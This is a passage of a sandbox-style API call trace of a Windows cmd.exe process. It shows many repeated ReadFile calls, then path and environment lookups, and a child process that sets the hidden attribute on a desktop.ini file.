lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.992] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, 
lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.993] ReadFile 
(in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 
[0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.994] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, 
lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.995] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, 
lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.996] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: 
lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.997] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.998] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0216.999] ReadFile (in: hFile=0x58, lpBuffer=0x2cedf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cdfe4, lpOverlapped=0x0 | out: lpBuffer=0x2cedf4*, lpNumberOfBytesRead=0x2cdfe4*=0x200, lpOverlapped=0x0) returned 1 [0217.025] FindClose (in: hFindFile=0x40e5e8 | out: 
hFindFile=0x40e5e8) returned 1 [0217.025] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0217.026] _close (_FileHandle=3) returned 0 [0217.026] GetConsoleTitleW (in: lpConsoleTitle=0x2cf490, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.026] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.026] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0217.026] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.027] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.027] FindClose (in: hFindFile=0x40e5e8 | out: hFindFile=0x40e5e8) returned 1 [0217.027] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0217.027] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0217.027] GetConsoleTitleW (in: lpConsoleTitle=0x2cf224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.027] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf0ac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf174 | out: lpAttributeList=0x2cf0ac, lpSize=0x2cf174) returned 1 [0217.027] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf0ac, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf16c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf0ac, lpPreviousValue=0x0) returned 1 [0217.027] GetStartupInfoW (in: lpStartupInfo=0x2cf068 | out: lpStartupInfo=0x2cf068*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, 
hStdOutput=0x0, hStdError=0x1000000)) [0217.027] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0217.027] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cf108*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cf154 | out: lpCommandLine="attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" ", lpProcessInformation=0x2cf154*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc6c, dwThreadId=0xbb4)) returned 1 [0217.029] CloseHandle (hObject=0x50) returned 1 [0217.029] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0217.029] GetEnvironmentStringsW () returned 0x412c70* [0217.029] FreeEnvironmentStringsW (penv=0x412c70) returned 1 [0217.029] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0217.075] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2cf048 | out: lpExitCode=0x2cf048*=0x0) returned 1 [0217.075] CloseHandle (hObject=0x4c) returned 1 [0217.075] _vsnwprintf (in: _Buffer=0x2cf190, _BufferCount=0x13, _Format="%08X", _ArgList=0x2cf054 | out: _Buffer="00000000") returned 8 [0217.075] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.075] GetEnvironmentStringsW () returned 0x412c70* [0217.075] FreeEnvironmentStringsW (penv=0x412c70) returned 1 [0217.075] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.076] GetEnvironmentStringsW () returned 
